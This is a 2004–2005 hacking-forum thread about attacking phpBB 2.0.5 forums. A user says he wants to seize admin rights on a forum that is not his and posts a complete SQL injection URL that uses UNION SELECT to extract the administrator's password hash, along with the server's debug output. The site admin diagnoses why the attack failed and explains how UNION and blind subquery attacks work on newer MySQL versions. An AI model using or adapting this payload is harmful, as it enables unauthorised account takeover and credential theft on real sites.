| 
	|  |  |  |  
        
          | 
              
                | 
                    
                      | 
                          
                            | 
	| 
	
		|  |  |  
		|  | IT Security and Insecurity Portal |  |  
 
	|  | phpbb 2.0.5 |  |  
	| 
	
		|  Posted: Mon May 31, 2004 1:03 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| the_strokes |  | Beginner |  |  
  |  |  |  | Joined: May 31, 2004 |  | Posts: 3 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| hi waraxe, i was trying to get the admin rights on a forum with your tutorial: http://waraxe.us/forum/viewtopic.php?t=8
 
 but the problem is that the forum version is 2.0.5 , i have the md5 hash but i cant ....
   i tryed with other xploits for example:
 
 privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/*
 
 and the request was:
 
 Could not query private message post information
 
 DEBUG MODE
 
 SQL Error : 1064 You have an error in your SQL syntax near 'UNION SELECT username,null,user_password,null,null,null,null,null,null,null,null' at line 5
 
 SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM phpbb_privmsgs pm, phpbb_privmsgs_text pmt, phpbb_users u, phpbb_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id AND pm.privmsgs_type=-99 UNION SELECT username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/*AND ( ( pm.privmsgs_to_userid = 989 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 989 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid
 
 Line : 246
 File : /www/docs/www.web.com/public_html/foro/privmsg.php
 
 ... what can i do?
 |  |  
		|  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Mon May 31, 2004 1:09 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| waraxe |  | Site admin |  |  
  |  |  |  | Joined: May 11, 2004 |  | Posts: 2407 |  | Location: Estonia, Tartu |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Its simple - that server's mysql version is older than 4.x, so it's not supporting UNION functionality  |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Mon May 31, 2004 11:20 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| the_strokes |  | Beginner |  |  
  |  |  |  | Joined: May 31, 2004 |  | Posts: 3 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| ok thank you so i cant do anything..
  |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Wed Jun 02, 2004 4:22 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| waraxe |  | Site admin |  |  
  |  |  |  | Joined: May 11, 2004 |  | Posts: 2407 |  | Location: Estonia, Tartu |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| That's right, you can't do anything because the server doesn't have the required functionality... |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Tue Nov 23, 2004 3:26 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Yomane |  | Regular user |  |  
  |  |  |  | Joined: Nov 23, 2004 |  | Posts: 8 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Humm so if I understand correctly, a phpBB 2.0.5 forum is more secure on MySQL 3.x than a forum on MySQL 4.x ? 
 No possibility to grab the MD5 Hash password of a user if we can't do SQL Injection at this time ?
 |  |  
		|  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Tue Nov 23, 2004 6:30 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| waraxe |  | Site admin |  |  
  |  |  |  | Joined: May 11, 2004 |  | Posts: 2407 |  | Location: Estonia, Tartu |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			|  	  | Yomane wrote: |  	  | Humm so if I understand correctly, a phpBB 2.0.5 forum is more secure on MySQL 3.x than a forum on MySQL 4.x ? 
 No possibility to grab the MD5 Hash password of a user if we can't do SQL Injection at this time ?
 | 
 
 Yes, with MySQl 3.x , which is without UNION and SubQueries
 functionality, there is change to get admin password's hash only
 in case, when sql query, affected by sql injection bug, is directly dealing
 with database table, containing admin password's hash.
 So - yeah - if you have MySql 3.x, you have actually better security.
 With 4.0 you must take care of possible UNION attacks and in case of
 4.1 situation get's even worst - subqueries with blind attack methods
 will give to attacker powerful possibilities to manipulate the database...
 |  |  
		|  |  |  
	|  |  
	|  | 406 |  |  
	| 
	
		|  Posted: Sat Aug 20, 2005 8:18 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| webjunky |  | Regular user |  |  
  |  |  |  | Joined: Jun 25, 2005 |  | Posts: 5 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| I get a 406-error when I try stuff with UNION like this... Anyone know what that is?
 |  |  
		|  |  |  
	|  |  
	| www.waraxe.us Forum Index -> Newbies corner 
 
	
		| You cannot post new topics in this forum You cannot reply to topics in this forum
 You cannot edit your posts in this forum
 You cannot delete your posts in this forum
 You cannot vote in polls in this forum
 
 | All times are GMT Page 1 of 1
 
 |  |  
	|  |  
 Powered by phpBB © 2001-2008 phpBB Group
 
 
 
 
 |  |  |  |  |